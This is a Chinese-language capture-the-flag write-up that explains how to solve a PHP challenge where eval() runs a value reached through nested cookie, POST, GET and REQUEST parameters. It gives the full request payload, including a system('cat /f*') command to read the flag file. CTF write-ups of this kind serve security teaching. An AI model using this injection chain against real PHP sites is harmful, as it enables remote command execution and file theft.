源码:eval($a=($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]));
payload:
Cookie: CTFshow-QQ群:=a
POST: a=b
GET: b=c&c[6][0][7][5][8][0][9][4][4]=system(“cat /f*”);
Burp发包会失败,因为Cookie是中文,Burp请求会乱码导致请求无效
仔细观察可以发现,这里是有一个参数传递的,每个方法的运行结果都要传递给外面的方法,所以请求都存在一个赋值,这里是从$_COOKIE这个方法开始的,从里面向外面传参,这里拿abc来做参数传递,赋值顺序 CTFshow-QQ群:=a a=b b=c c=xxx
然后通过不同的请求方法传递就行
1、cookie参数是 "CTFshow-QQ群: " 那么cookie应该是这样构造的
cookie: CTFshow-QQ群:=a
所以cookie=a 这里 $_POST[$_COOKIE['CTFshow-QQ群:']] 就变成了 $_POST['a'] 所以post的参数就是 a了
2、这里的a又作为一个参数传递给了POST,所以post方法,a就是参数了
post数据:a=b
3、这里b又可以作为GET的参数了,所以设置 ?b=c
4、$_REQUEST['c'] c是POST方法的结果,作为这个方法的参数
到了$_REQUEST[]方法,这个方法就是通过请求获取数据,测试的时候,用GET请求或者POST请求都可以,只要有一个赋值的动作就行,那请求就是c=xxxxx
5、最后还有一串数字,这里不是数组,而是下标,那要满足这个下标就是这种形式
所以不可能搞一大堆数组吧,也没办法,那这样,直接指定这个序列是什么值就行
c[6][0][7][5][8][0][9][4][4]=system(‘cat /f*’);
大龄菜鸟写文章,对你有帮助也点点赞吧,朋友圈没人点赞,技术文章就点点赞吧 [捂脸]
1460
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
